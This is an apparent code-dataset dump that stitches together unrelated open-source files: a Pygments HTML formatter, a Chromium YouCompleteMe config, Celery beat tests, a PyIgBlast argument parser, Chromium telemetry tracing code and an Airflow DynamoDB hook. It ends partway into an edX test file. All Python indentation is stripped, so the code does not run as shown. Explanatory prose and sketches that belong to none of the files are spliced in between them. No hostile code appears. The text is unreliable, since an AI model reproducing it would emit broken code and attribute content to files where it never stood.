cls = self._get_css_class(ttype)
cspan = cls and '<span class="%s">' % cls or ''
parts = escape_html(value).split('\n')
# for all but the last line
for part in parts[:-1]:
if line:
if lspan != cspan:
line += (lspan and '</span>') + cspan + part + \
(cspan and '</span>') + lsep
else: # both are the same
line += part + (lspan and '</span>') + lsep
yield 1, line
line = ''
elif part:
yield 1, cspan + part + (cspan and '</span>') + lsep
else:
yield 1, lsep
# for the last line
if line and parts[-1]:
if lspan != cspan:
line += (lspan and '</span>') + cspan + parts[-1]
lspan = cspan
else:
line += parts[-1]
elif parts[-1]:
line = cspan + parts[-1]
lspan = cspan
# else we neither have to open a new span nor set lspan
if line:
yield 1, line + (lspan and '</span>') + lsep
def _highlight_lines(self, tokensource):
"""
Highlight the lines specified in the `hl_lines` option by
post-processing the token stream coming from `_format_lines`.
"""
hls = self.hl_lines
for i, (t, value) in enumerate(tokensource):
if t != 1:
yield t, value
if i + 1 in hls: # i + 1 because Python indexes start at 0
if self.noclasses:
style = ''
if self.style.highlight_color is not None:
style = (' style="background-color: %s"' %
(self.style.highlight_color,))
yield 1, '<span%s>%s</span>' % (style, value)
else:
yield 1, '<span class="hll">%s</span>' % value
else:
yield 1, value
def wrap(self, source, outfile):
"""
Wrap the ``source``, which is a generator yielding
individual lines, in custom generators. See docstring
for `format`. Can be overridden.
"""
return self._wrap_div(self._wrap_pre(source))
def format_unencoded(self, tokensource, outfile):
"""
The formatting process uses several nested generators; which of
them are used is determined by the user's options.
Each generator should take at least one argument, ``inner``,
and wrap the pieces of text generated by this.
Always yield 2-tuples: (code, text). If "code" is 1, the text
is part of the original tokensource being highlighted, if it's
0, the text is some piece of wrapping. This makes it possible to
use several different wrappers that process the original source
linewise, e.g. line number generators.
"""
source = self._format_lines(tokensource)
if self.hl_lines:
source = self._highlight_lines(source)
if not self.nowrap:
if self.linenos == 2:
source = self._wrap_inlinelinenos(source)
if self.lineanchors:
source = self._wrap_lineanchors(source)
source = self.wrap(source, outfile)
if self.linenos == 1:
source = self._wrap_tablelinenos(source)
if self.full:
source = self._wrap_full(source, outfile)
for t, piece in source:
outfile.write(piece)
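The `format_unencoded` docstring above describes a protocol in which each wrapper generator consumes and yields `(code, text)` 2-tuples, with code 1 marking original source lines and 0 marking wrapping markup. A minimal standalone sketch of that protocol (all names below are illustrative, not part of Pygments):

```python
# Minimal sketch of the (code, text) generator-wrapping protocol used above.
# Wrappers consume 2-tuples and emit their own: code 1 marks original source
# lines, code 0 marks wrapping markup. Names here are illustrative only.

def format_lines(source_lines):
    # Innermost generator: every yielded tuple is real source (code == 1).
    for line in source_lines:
        yield 1, line + '\n'

def wrap_linenos(inner, start=1):
    # A line-number wrapper only counts tuples whose code is 1, so markup
    # emitted by other wrappers never shifts the numbering.
    num = start
    for code, text in inner:
        if code:
            yield 1, '%4d  %s' % (num, text)
            num += 1
        else:
            yield code, text

def wrap_div(inner):
    # Outermost wrapper: markup is emitted with code 0.
    yield 0, '<div class="highlight">'
    for tup in inner:
        yield tup
    yield 0, '</div>'

def render(source_lines):
    return ''.join(text for _, text in
                   wrap_div(wrap_linenos(format_lines(source_lines))))
```

Because line-number wrappers count only tuples with code 1, markup added by other wrappers can never shift the numbering.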
|
Bysmyyr/chromium-crosswalk | refs/heads/master | tools/vim/chromium.ycm_extra_conf.py | 15 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Autocompletion config for YouCompleteMe in Chromium.
#
# USAGE:
#
# 1. Install YCM [https://github.com/Valloric/YouCompleteMe]
# (Googlers should check out [go/ycm])
#
# 2. Create a symbolic link to this file called .ycm_extra_conf.py in the
# directory above your Chromium checkout (i.e. next to your .gclient file).
#
# cd src
# ln -rs tools/vim/chromium.ycm_extra_conf.py ../.ycm_extra_conf.py
#
# 3. (optional) Whitelist the .ycm_extra_conf.py from step #2 by adding the
# following to your .vimrc:
#
# let g:ycm_extra_conf_globlist=['<path to .ycm_extra_conf.py>']
#
# You can also add other .ycm_extra_conf.py files you want to use to this
# list to prevent excessive prompting each time you visit a directory
# covered by a config file.
#
# 4. Profit
#
#
# Usage notes:
#
# * You must use ninja & clang to build Chromium.
#
# * You must have run gyp_chromium and built Chromium recently.
#
#
# Hacking notes:
#
# * The purpose of this script is to construct an accurate enough command line
# for YCM to pass to clang so it can build and extract the symbols.
#
# * Right now, we only pull the -I and -D flags. That seems to be sufficient
# for everything I've used it for.
#
# * That whole ninja & clang thing? We could support other configs if someone
# were willing to write the correct commands and a parser.
#
# * This has only been tested on gPrecise.
import os
import os.path
import re
import shlex
import subprocess
import sys
# Flags from YCM's default config.
_default_flags = [
'-DUSE_CLANG_COMPLETER',
'-std=c++11',
'-x',
'c++',
]
def PathExists(*args):
return os.path.exists(os.path.join(*args))
def FindChromeSrcFromFilename(filename):
"""Searches for the root of the Chromium checkout.
Simply checks parent directories until it finds .gclient and src/.
Args:
filename: (String) Path to source file being edited.
Returns:
(String) Path of 'src/', or None if unable to find.
"""
curdir = os.path.normpath(os.path.dirname(filename))
while not (os.path.basename(os.path.realpath(curdir)) == 'src'
and PathExists(curdir, 'DEPS')
and (PathExists(curdir, '..', '.gclient')
or PathExists(curdir, '.git'))):
nextdir = os.path.normpath(os.path.join(curdir, '..'))
if nextdir == curdir:
return None
curdir = nextdir
return curdir
def GetDefaultSourceFile(chrome_root, filename):
"""Returns the default source file to use as an alternative to |filename|.
Compile flags used to build the default source file are assumed to be a
close-enough approximation for building |filename|.
Args:
chrome_root: (String) Absolute path to the root of Chromium checkout.
filename: (String) Absolute path to the source file.
Returns:
(String) Absolute path to substitute source file.
"""
blink_root = os.path.join(chrome_root, 'third_party', 'WebKit')
if filename.startswith(blink_root):
return os.path.join(blink_root, 'Source', 'core', 'Init.cpp')
else:
return os.path.join(chrome_root, 'base', 'logging.cc')
def GetBuildableSourceFile(chrome_root, filename):
"""Returns a buildable source file corresponding to |filename|.
A buildable source file is one which is likely to be passed into clang as a
source file during the build. For .h files, returns the closest matching .cc,
.cpp or .c file. If no such file is found, returns the same as
GetDefaultSourceFile().
Args:
chrome_root: (String) Absolute path to the root of Chromium checkout.
filename: (String) Absolute path to the target source file.
Returns:
(String) Absolute path to source file.
"""
if filename.endswith('.h'):
# Header files can't be built. Instead, try to match a header file to its
# corresponding source file.
alternates = ['.cc', '.cpp', '.c']
for alt_extension in alternates:
alt_name = filename[:-2] + alt_extension
if os.path.exists(alt_name):
return alt_name
return GetDefaultSourceFile(chrome_root, filename)
return filename
def GetNinjaBuildOutputsForSourceFile(out_dir, filename):
"""Returns a list of build outputs for filename.
The list is generated by invoking 'ninja -t query' tool to retrieve a list of
inputs and outputs of |filename|. This list is then filtered to only include
.o and .obj outputs.
Args:
out_dir: (String) Absolute path to ninja build output directory.
filename: (String) Absolute path to source file.
Returns:
(List of Strings) List of target names. Will return [] if |filename| doesn't
yield any .o or .obj outputs.
"""
# Ninja needs the path to the source file relative to the output build
# directory.
rel_filename = os.path.relpath(os.path.realpath(filename), out_dir)
p = subprocess.Popen(['ninja', '-C', out_dir, '-t', 'query', rel_filename],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, _ = p.communicate()
if p.returncode:
return []
# The output looks like:
# ../../relative/path/to/source.cc:
# outputs:
# obj/relative/path/to/target.source.o
# obj/some/other/target2.source.o
# another/target.txt
#
outputs_text = stdout.partition('\n outputs:\n')[2]
output_lines = [line.strip() for line in outputs_text.split('\n')]
return [target for target in output_lines
if target and (target.endswith('.o') or target.endswith('.obj'))]
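The output-filtering step above (keep only `.o`/`.obj` targets from the `ninja -t query` listing) can be exercised in isolation; a small sketch using a fabricated sample of the query output shown in the comment (the function name is hypothetical):

```python
def filter_object_outputs(ninja_query_stdout):
    # Everything after the 'outputs:' marker is the outputs listing; keep
    # only object-file targets, dropping e.g. .txt side outputs.
    outputs_text = ninja_query_stdout.partition('\n  outputs:\n')[2]
    lines = [line.strip() for line in outputs_text.split('\n')]
    return [t for t in lines
            if t and (t.endswith('.o') or t.endswith('.obj'))]
```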
def GetClangCommandLineForNinjaOutput(out_dir, build_target):
"""Returns the Clang command line for building |build_target|
Asks ninja for the list of commands used to build |filename| and returns the
final Clang invocation.
Args:
out_dir: (String) Absolute path to ninja build output directory.
build_target: (String) A build target understood by ninja
Returns:
(String or None) Clang command line or None if a Clang command line couldn't
be determined.
"""
p = subprocess.Popen(['ninja', '-v', '-C', out_dir,
'-t', 'commands', build_target],
stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
if p.returncode:
return None
# Ninja will return multiple build steps for all dependencies up to
# |build_target|. The build step we want is the last Clang invocation, which
# is expected to be the one that outputs |build_target|.
for line in reversed(stdout.split('\n')):
if 'clang' in line:
return line
return None
def GetClangCommandLineFromNinjaForSource(out_dir, filename):
"""Returns a Clang command line used to build |filename|.
The same source file could be built multiple times using different
toolchains. In such cases, this function returns the first Clang invocation. We
currently don't prefer one toolchain over another. Hopefully the toolchain
corresponding to the Clang command line is compatible with the Clang build
used by YCM.
Args:
out_dir: (String) Absolute path to ninja build output directory.
filename: (String) Absolute path to source file.
Returns:
(String or None): Command line for Clang invocation using |filename| as a
source. Returns None if no such command line could be found.
"""
build_targets = GetNinjaBuildOutputsForSourceFile(out_dir, filename)
for build_target in build_targets:
command_line = GetClangCommandLineForNinjaOutput(out_dir, build_target)
if command_line:
return command_line
return None
def GetClangOptionsFromCommandLine(clang_commandline, out_dir,
additional_flags):
"""Extracts relevant command line options from |clang_commandline|
Args:
clang_commandline: (String) Full Clang invocation.
out_dir: (String) Absolute path to ninja build directory. Relative paths in
the command line are relative to |out_dir|.
additional_flags: (List of String) Additional flags to return.
Returns:
(List of Strings) The list of command line flags for this source file. Can
be empty.
"""
clang_flags = [] + additional_flags
# Parse flags that are important for YCM's purposes.
clang_tokens = shlex.split(clang_commandline)
for flag_index, flag in enumerate(clang_tokens):
if flag.startswith('-I'):
# Relative paths need to be resolved, because they're relative to the
# output dir, not the source.
if flag[2] == '/':
clang_flags.append(flag)
else:
abs_path = os.path.normpath(os.path.join(out_dir, flag[2:]))
clang_flags.append('-I' + abs_path)
elif flag.startswith('-std'):
clang_flags.append(flag)
elif flag.startswith('-') and flag[1] in 'DWFfmO':
if flag == '-Wno-deprecated-register' or flag == '-Wno-header-guard':
# These flags cause libclang (3.3) to crash. Remove them until things
# are fixed.
continue
clang_flags.append(flag)
elif flag == '-isysroot':
# On Mac -isysroot <path> is used to find the system headers.
# Copy over both flags.
if flag_index + 1 < len(clang_tokens):
clang_flags.append(flag)
clang_flags.append(clang_tokens[flag_index + 1])
return clang_flags
def GetClangOptionsFromNinjaForFilename(chrome_root, filename):
"""Returns the Clang command line options needed for building |filename|.
Command line options are based on the command used by ninja for building
|filename|. If |filename| is a .h file, uses its companion .cc or .cpp file.
If a suitable companion file can't be located or if ninja doesn't know about
|filename|, then uses default source files in Blink and Chromium for
determining the commandline.
Args:
chrome_root: (String) Path to src/.
filename: (String) Absolute path to source file being edited.
Returns:
(List of Strings) The list of command line flags for this source file. Can
be empty.
"""
if not chrome_root:
return []
# Generally, everyone benefits from including Chromium's src/, because all of
# Chromium's includes are relative to that.
additional_flags = ['-I' + os.path.join(chrome_root)]
# The version of Clang used to compile Chromium can be newer than the version
# of libclang that YCM uses for completion. So it's possible that YCM's
# libclang doesn't know about some of the warning options used, which causes
# compilation warnings (and errors, because of '-Werror');
additional_flags.append('-Wno-unknown-warning-option')
sys.path.append(os.path.join(chrome_root, 'tools', 'vim'))
from ninja_output import GetNinjaOutputDirectory
out_dir = os.path.realpath(GetNinjaOutputDirectory(chrome_root))
clang_line = GetClangCommandLineFromNinjaForSource(
out_dir, GetBuildableSourceFile(chrome_root, filename))
if not clang_line:
# If ninja didn't know about filename or its companion files, then try a
# default build target. It is possible that the file is new, or build.ninja
# is stale.
clang_line = GetClangCommandLineFromNinjaForSource(
out_dir, GetDefaultSourceFile(chrome_root, filename))
if not clang_line:
return (additional_flags, [])
return GetClangOptionsFromCommandLine(clang_line, out_dir, additional_flags)
def FlagsForFile(filename):
"""This is the main entry point for YCM. Its interface is fixed.
Args:
filename: (String) Path to source file being edited.
Returns:
(Dictionary)
'flags': (List of Strings) Command line flags.
'do_cache': (Boolean) True if the result should be cached.
"""
abs_filename = os.path.abspath(filename)
chrome_root = FindChromeSrcFromFilename(abs_filename)
clang_flags = GetClangOptionsFromNinjaForFilename(chrome_root, abs_filename)
# If clang_flags could not be determined, then assume that was due to a
# transient failure. Preventing YCM from caching the flags allows us to try to
# determine the flags again.
should_cache_flags_for_file = bool(clang_flags)
final_flags = _default_flags + clang_flags
return {
'flags': final_flags,
'do_cache': should_cache_flags_for_file
}
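The flag extraction performed by `GetClangOptionsFromCommandLine` hinges on one detail: `-I` paths in the ninja command are relative to the build output directory, not to the source file. A reduced sketch of just that resolution step (the function name is hypothetical):

```python
import os
import shlex

def extract_include_flags(command_line, out_dir):
    # Collect -I flags, rebasing relative paths onto the build output dir.
    flags = []
    for token in shlex.split(command_line):
        if token.startswith('-I'):
            path = token[2:]
            if not os.path.isabs(path):
                path = os.path.normpath(os.path.join(out_dir, path))
            flags.append('-I' + path)
    return flags
```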
|
moijes12/oh-mainline | refs/heads/master | vendor/packages/celery/celery/tests/test_bin/test_celerybeat.py | 32 | from __future__ import absolute_import
from __future__ import with_statement
import logging
import sys
from collections import defaultdict
from kombu.tests.utils import redirect_stdouts
from celery import beat
from celery import platforms
from celery.app import app_or_default
from celery.bin import celerybeat as celerybeat_bin
from celery.apps import beat as beatapp
from celery.tests.utils import AppCase
class MockedShelveModule(object):
shelves = defaultdict(lambda: {})
def open(self, filename, *args, **kwargs):
return self.shelves[filename]
mocked_shelve = MockedShelveModule()
class MockService(beat.Service):
started = False
in_sync = False
persistence = mocked_shelve
def start(self):
self.__class__.started = True
def sync(self):
self.__class__.in_sync = True
class MockBeat(beatapp.Beat):
running = False
def run(self):
self.__class__.running = True
class MockBeat2(beatapp.Beat):
Service = MockService
def install_sync_handler(self, b):
pass
class MockBeat3(beatapp.Beat):
Service = MockService
def install_sync_handler(self, b):
raise TypeError("xxx")
class test_Beat(AppCase):
def test_loglevel_string(self):
b = beatapp.Beat(loglevel="DEBUG")
self.assertEqual(b.loglevel, logging.DEBUG)
b2 = beatapp.Beat(loglevel=logging.DEBUG)
self.assertEqual(b2.loglevel, logging.DEBUG)
def test_init_loader(self):
b = beatapp.Beat()
b.init_loader()
def test_process_title(self):
b = beatapp.Beat()
b.set_process_title()
def test_run(self):
b = MockBeat2()
MockService.started = False
b.run()
self.assertTrue(MockService.started)
def psig(self, fun, *args, **kwargs):
handlers = {}
class Signals(platforms.Signals):
def __setitem__(self, sig, handler):
handlers[sig] = handler
p, platforms.signals = platforms.signals, Signals()
try:
fun(*args, **kwargs)
return handlers
finally:
platforms.signals = p
def test_install_sync_handler(self):
b = beatapp.Beat()
clock = MockService()
MockService.in_sync = False
handlers = self.psig(b.install_sync_handler, clock)
with self.assertRaises(SystemExit):
handlers["SIGINT"]("SIGINT", object())
self.assertTrue(MockService.in_sync)
MockService.in_sync = False
def test_setup_logging(self):
try:
# py3k
delattr(sys.stdout, "logger")
except AttributeError:
pass
b = beatapp.Beat()
b.redirect_stdouts = False
b.setup_logging()
with self.assertRaises(AttributeError):
sys.stdout.logger
@redirect_stdouts
def test_logs_errors(self, stdout, stderr):
class MockLogger(object):
_critical = []
def debug(self, *args, **kwargs):
pass
def critical(self, msg, *args, **kwargs):
self._critical.append(msg)
logger = MockLogger()
b = MockBeat3(socket_timeout=None)
b.start_scheduler(logger)
self.assertTrue(logger._critical)
@redirect_stdouts
def test_use_pidfile(self, stdout, stderr):
from celery import platforms
class create_pidlock(object):
instance = [None]
def __init__(self, file):
self.file = file
self.instance[0] = self
def acquire(self):
self.acquired = True
class Object(object):
def release(self):
pass
return Object()
prev, platforms.create_pidlock = platforms.create_pidlock, \
create_pidlock
try:
b = MockBeat2(pidfile="pidfilelockfilepid", socket_timeout=None)
b.start_scheduler()
self.assertTrue(create_pidlock.instance[0].acquired)
finally:
platforms.create_pidlock = prev
class MockDaemonContext(object):
opened = False
closed = False
def __init__(self, *args, **kwargs):
pass
def open(self):
self.__class__.opened = True
return self
__enter__ = open
def close(self, *args):
self.__class__.closed = True
__exit__ = close
class test_div(AppCase):
def setup(self):
self.prev, beatapp.Beat = beatapp.Beat, MockBeat
self.ctx, celerybeat_bin.detached = \
celerybeat_bin.detached, MockDaemonContext
def teardown(self):
beatapp.Beat = self.prev
def test_main(self):
sys.argv = [sys.argv[0], "-s", "foo"]
try:
celerybeat_bin.main()
self.assertTrue(MockBeat.running)
finally:
MockBeat.running = False
def test_detach(self):
cmd = celerybeat_bin.BeatCommand()
cmd.app = app_or_default()
cmd.run(detach=True)
self.assertTrue(MockDaemonContext.opened)
self.assertTrue(MockDaemonContext.closed)
def test_parse_options(self):
cmd = celerybeat_bin.BeatCommand()
cmd.app = app_or_default()
options, args = cmd.parse_options("celerybeat", ["-s", "foo"])
self.assertEqual(options.schedule, "foo")
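Several of the tests above rely on the same monkeypatching idiom: swap a module attribute for a mock, run the code under test, and restore the original in a `finally` block (see `psig` and `test_use_pidfile`). The pattern can be factored into a helper; a sketch (the helper name is not part of celery):

```python
def with_patched(module, name, replacement, fun, *args, **kwargs):
    # Temporarily replace module.<name>, guaranteeing restoration even if
    # fun raises -- the same try/finally shape used in the tests above.
    original = getattr(module, name)
    setattr(module, name, replacement)
    try:
        return fun(*args, **kwargs)
    finally:
        setattr(module, name, original)
```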
|
ivan-fedorov/intellij-community | refs/heads/master | python/testData/formatter/alignInGenerators.py | 83 | def supprice():
if True:
if True:
agdrn = sum(VARS[drn + price] * md.c[drn][1] * md.c[drn][3] *
exp(md.c[drn][2] * VARS['SEEPAGE'] - md.c[drn][3] * pmp)
for drn in md.agdrn_nodes if drn in md.c)
|
andrejbranch/pyigblast | refs/heads/master | arg_parse.py | 1 | import argparse
import textwrap
from Bio import SeqIO
import os
import shutil
from multiprocessing import cpu_count
class blastargument_parser():
# call on all our file type parsers in the sequence_anlysis_method
def __init__(self):
"""A customized argument parser that does a LOT of error checking"""
self.parser = argparse.ArgumentParser(prog="igblast", formatter_class=argparse.RawTextHelpFormatter, description=textwrap.dedent('''\
PyIgBlast
__________________________________________________________________________________________\n
PyIgBlast calls upon igblastn for nucleotides. Uses multiprocessing to split up the fasta file.
Parses the output to a csv/tsv/JSON and allows upload to MongoDB or MySQL databases
author - Joran Willis
'''))
# Necessary Arguments
neces = self.parser.add_argument_group(
title='Necessary', description="These have to be included")
# query
neces.add_argument(
"-q", "--query", metavar="query.fasta", required=True, type=self._check_if_fasta, help="The fasta file to be input into igBlast")
# database path
neces.add_argument(
"-d", "--db_path", required=True, type=self._check_if_db_exists, help="The database path to the germline repertoire")
# internal_data path
neces.add_argument(
"-i", "--internal_data", required=True, type=self._check_if_db_exists, help="The database path to internal data repertoire")
# recommended options
recommended = self.parser.add_argument_group(
title="\nRecommended", description="Not necessary to run but recommended")
recommended.add_argument(
"-a", "--aux_path", type=self._check_if_aux_path_exists, help="The auxilariay path that contains the frame origins of the germline genes for each repertoire, \
helps produce translation and other metrics")
# IGBlast Specif Options
igspec = self.parser.add_argument_group(
title="\nIgBlast Sprecific", description="IgBlast Specific Options with a Default")
igspec.add_argument(
"-or", "--organism", default="human", choices=["human", "mouse"], help="The organism repeortire to blast against")
igspec.add_argument(
"-nV", "--num_v", default=3, type=int, help="How many V-genes to match?")
igspec.add_argument(
"-nD", "--num_d", default=3, type=int, help="How many D-genes to match?")
igspec.add_argument(
"-nJ", "--num_j", default=3, type=int, help="How many J-genes to match?")
igspec.add_argument("-dgm", "--d_gene_matches", default=5, type=int,
help="How many nuclodtieds in the D-gene must match to call it a hit")
igspec.add_argument("-s", "--domain", default="imgt", choices=[
"imgt", "kabat"], help="Which classification system do you want")
igspec.add_argument("-sT", "--show_translation", default=False,
action="store_true", help="Do you want to show the translation of the alignments")
# General Blast Settings
general = self.parser.add_argument_group(
title="\nGeneral Settings", description="General Settings for Blast")
general.add_argument(
"-x", '--executable', type=self._check_if_executable_exists,
help="The location of the executable, default is /usr/bin/igblastn")
general.add_argument(
"-o", "--out", help="output file prefix", default="igblast_out")
general.add_argument("-e", "--e_value", type=str, default="1e-15",
help="Real value for excpectation value threshold in blast, put in scientific notation")
general.add_argument("-w", "--word_size", type=int,
default=4, help="Word size for wordfinder algorithm")
general.add_argument("-pm", "--penalty_mismatch", type=int,
default=0, help="Penalty for nucleotide mismatch")
general.add_argument(
"-rm", "--reward_match", type=int, default=0, help="Reward for nucleotide match")
general.add_argument("-mT", "--max_target_seqs", type=int, default=500,
help="Maximum number of alingned sequences to iterate through at a time")
general.add_argument(
"-nP", "--num_procs", type=int, default=cpu_count(),
help="How many do you want to split the job across, default is the number of processors")
formatter = self.parser.add_argument_group(
title="Formatting Options", description="Formatting options mostly available"
)
formatter.add_argument("-f", "--format_options", type=str, default="default", help="default is a tab seperated format of\n\n\
qseqid sseqid pident length mismatch gapopen qstart qend sstart send\n\n\
The format file is in the database path as format_template.txt. Uncomment out the metrics you want to use")
formatter.add_argument("-z","--zip",default=False,action="store_true",help="Zip up all output files")
formatter.add_argument("-c","--concatenate",default=True,action="store_false",help="Turn off automatic concatenation and deletion of temporary files. Files are split up at the beginning to run across multiple processors")
json_specific = self.parser.add_argument_group(
title="\nOutput parsing settings",description = "These are the options for creating a JSON files from the blastoutput that is easily uploaded to a mongo database")
json_specific.add_argument("-j","--json",action="store_true",default=False,help="Use the JSON output option that will format the text driven igblast output to a json document")
json_specific.add_argument("-jp","--json_prefix",default="igblast_output",help="The prefix for json_output files")
# one special boolean case
self.show_translation = False
# return the arguments
self.args = self.parser.parse_args()
# get them ready to ship out
self._make_args_dict()
# helper functions
def _check_if_fasta(self, f_file):
try:
SeqIO.parse(f_file, "fasta").next()
return f_file
# return SeqIO.parse(f_file,"fasta")
except StopIteration:
msg = "{0} is not a fasta file\n".format(f_file)
raise argparse.ArgumentTypeError(msg)
def _check_if_executable_exists(self, x_path):
if not os.path.exists(x_path):
msg = "path to executable {0} does not exist, use -h for help\n".format(
x_path)
raise argparse.ArgumentTypeError(msg)
if not os.access(x_path, os.R_OK):
msg1 = "executable {0} does not permission to run\n".format(x_path)
raise argparse.ArgumentTypeError(msg1)
else:
return x_path
def _check_if_db_exists(self, db_path):
if os.path.exists(db_path):
return db_path
else:
msg = "{0} path for does not exist for database\n".format(db_path)
raise argparse.ArgumentTypeError(msg)
def _check_if_aux_path_exists(self, aux_path):
if os.path.exists(aux_path):
return aux_path
else:
msg = "{0} path for aux files does not exist\n".format(aux_path)
raise argparse.ArgumentTypeError(msg)
def _make_args_dict(self):
# copy internal data directory to current location
# shutil.copytree(self.args.internal_data,'.')
try:
shutil.copytree(self.args.internal_data, './internal_data')
except OSError:
print "Internal Data direcotry file exists in this directory, skipping..."
self.args_dict = {
'-query': self.args.query,
'-organism': self.args.organism,
'-num_alignments_V': self.args.num_v,
'-num_alignments_D': self.args.num_d,
'-num_alignments_J': self.args.num_j,
'-min_D_match': self.args.d_gene_matches,
'-domain_system': self.args.domain,
'-out': self.args.out,
'-evalue': self.args.e_value,
'-word_size': self.args.word_size,
'-max_target_seqs': self.args.max_target_seqs,
'-germline_db_V': "{0}{1}_gl_V".format(self.args.db_path, self.args.organism),
'-germline_db_D': "{0}{1}_gl_D".format(self.args.db_path, self.args.organism),
'-germline_db_J': "{0}{1}_gl_J".format(self.args.db_path, self.args.organism)
}
# add bool options
if self.args.penalty_mismatch:
self.args_dict['-penalty'] = self.args.penalty_mismatch
if self.args.reward_match:
self.args_dict['-reward'] = self.args.reward_match
if self.args.show_translation:
self.show_translation = True
if self.args.aux_path:
self.args_dict['-auxiliary_data'] = "{0}{1}_gl.aux".format(
self.args.aux_path, self.args.organism)
# add formatting option
if self.args.format_options == 'default':
self.args_dict['-outfmt'] = 7
else:
self.args.format_options = self._check_if_db_exists(
self.args.format_options)
formatting_titles = []
for line in open(self.args.format_options).readlines():
if line.startswith("#"):
continue
else:
formatting_titles.append(line.split()[0])
format = "7 " + " ".join(formatting_titles)
self.args_dict['-outfmt'] = format
# only non-member functions needed
def return_parsed_args(self):
return self.args_dict
def return_command_line(self):
'''return the full command line as a single string'''
return ' '.join(self.return_command_line_from_dict(self.args_dict))
def return_command_line_from_dict(self, cline_dict):
'''return command line as a list to put in subprocess
--args
cline_dict - The command line dictionary to return. We add in the executable'''
if self.args.executable:
cline = [self.args.executable]
else:
cline = [self._check_if_executable_exists("/usr/bin/igblastn")]
for command in cline_dict:
cline.append(str(command))
cline.append(str(self.args_dict[command]))
return cline
if __name__ == '__main__':
args = blastargument_parser().return_command_line()
print args
|
codenote/chromium-test | refs/heads/master | tools/telemetry/telemetry/core/chrome/tracing_backend.py | 4 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import cStringIO
import json
import logging
import socket
import threading
from telemetry.core import util
from telemetry.core.chrome import trace_event_importer
from telemetry.core.chrome import trace_result
from telemetry.core.chrome import websocket
class TracingUnsupportedException(Exception):
pass
class TraceResultImpl(object):
def __init__(self, tracing_data):
self._tracing_data = tracing_data
def Serialize(self, f):
f.write('{"traceEvents": [')
d = self._tracing_data
# Note: we're not using ','.join here because the strings that are in the
# tracing data are typically many megabytes in size. In the fast case, f is
# just a file, so by skipping the in memory step we keep our memory
# footprint low and avoid additional processing.
if len(d) == 0:
pass
elif len(d) == 1:
f.write(d[0])
else:
f.write(d[0])
for i in range(1, len(d)):
f.write(',')
f.write(d[i])
f.write(']}')
def AsTimelineModel(self):
f = cStringIO.StringIO()
self.Serialize(f)
return trace_event_importer.Import(
f.getvalue())
class TracingBackend(object):
def __init__(self, devtools_port):
debugger_url = 'ws://localhost:%i/devtools/browser' % devtools_port
self._socket = websocket.create_connection(debugger_url)
self._next_request_id = 0
self._cur_socket_timeout = 0
self._thread = None
self._tracing_data = []
def BeginTracing(self):
self._CheckNotificationSupported()
req = {'method': 'Tracing.start'}
self._SyncRequest(req)
# Tracing.start will send asynchronous notifications containing trace
# data, until Tracing.end is called.
self._thread = threading.Thread(target=self._TracingReader)
self._thread.start()
def EndTracing(self):
req = {'method': 'Tracing.end'}
self._SyncRequest(req)
self._thread.join()
self._thread = None
def GetTraceResultAndReset(self):
assert not self._thread
ret = trace_result.TraceResult(
TraceResultImpl(self._tracing_data))
self._tracing_data = []
return ret
def Close(self):
if self._socket:
self._socket.close()
self._socket = None
def _TracingReader(self):
while self._socket:
try:
data = self._socket.recv()
if not data:
break
res = json.loads(data)
logging.debug('got [%s]', data)
if 'Tracing.dataCollected' == res.get('method'):
value = res.get('params', {}).get('value')
self._tracing_data.append(value)
elif 'Tracing.tracingComplete' == res.get('method'):
break
except (socket.error, websocket.WebSocketException):
logging.warning('Timeout waiting for tracing response, unusual.')
def _SyncRequest(self, req, timeout=10):
self._SetTimeout(timeout)
req['id'] = self._next_request_id
self._next_request_id += 1
data = json.dumps(req)
logging.debug('will send [%s]', data)
self._socket.send(data)
def _SetTimeout(self, timeout):
if self._cur_socket_timeout != timeout:
self._socket.settimeout(timeout)
self._cur_socket_timeout = timeout
def _CheckNotificationSupported(self):
"""Ensures we're running against a compatible version of chrome."""
req = {'method': 'Tracing.hasCompleted'}
self._SyncRequest(req)
while True:
try:
data = self._socket.recv()
except (socket.error, websocket.WebSocketException):
raise util.TimeoutException(
'Timed out waiting for reply. This is unusual.')
logging.debug('got [%s]', data)
res = json.loads(data)
if res['id'] != req['id']:
logging.debug('Dropped reply: %s', json.dumps(res))
continue
if res.get('response'):
raise TracingUnsupportedException(
'Tracing not supported for this browser')
elif 'error' in res:
return
|
wileeam/airflow | refs/heads/master | airflow/providers/amazon/aws/hooks/aws_dynamodb_hook.py | 2 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This module contains the AWS DynamoDB hook
"""
from airflow.exceptions import AirflowException
from airflow.providers.amazon.aws.hooks.aws_hook import AwsHook
class AwsDynamoDBHook(AwsHook):
"""
Interact with AWS DynamoDB.
:param table_keys: partition key and sort key
:type table_keys: list
:param table_name: target DynamoDB table
:type table_name: str
:param region_name: aws region name (example: us-east-1)
:type region_name: str
"""
def __init__(self,
table_keys=None,
table_name=None,
region_name=None,
*args, **kwargs):
self.table_keys = table_keys
self.table_name = table_name
self.region_name = region_name
self.conn = None
super().__init__(*args, **kwargs)
def get_conn(self):
self.conn = self.get_resource_type('dynamodb', self.region_name)
return self.conn
def write_batch_data(self, items):
"""
Write batch items to DynamoDB table with provisioned throughput capacity.
"""
dynamodb_conn = self.get_conn()
try:
table = dynamodb_conn.Table(self.table_name)
with table.batch_writer(overwrite_by_pkeys=self.table_keys) as batch:
for item in items:
batch.put_item(Item=item)
return True
except Exception as general_error:
raise AirflowException(
'Failed to insert items in dynamodb, error: {error}'.format(
error=str(general_error)
)
)
|
devs1991/test_edx_docmode | refs/heads/master | lms/djangoapps/instructor/tests/test_enrollment.py | 13 | # -*- coding: utf-8 -*-
"""
Unit tests for instructor.enrollment methods.
"""
import json
import mock
from mock import patch
from abc import ABCMeta
from courseware.models import StudentModule
from django.conf import settings
from django.test import TestCase
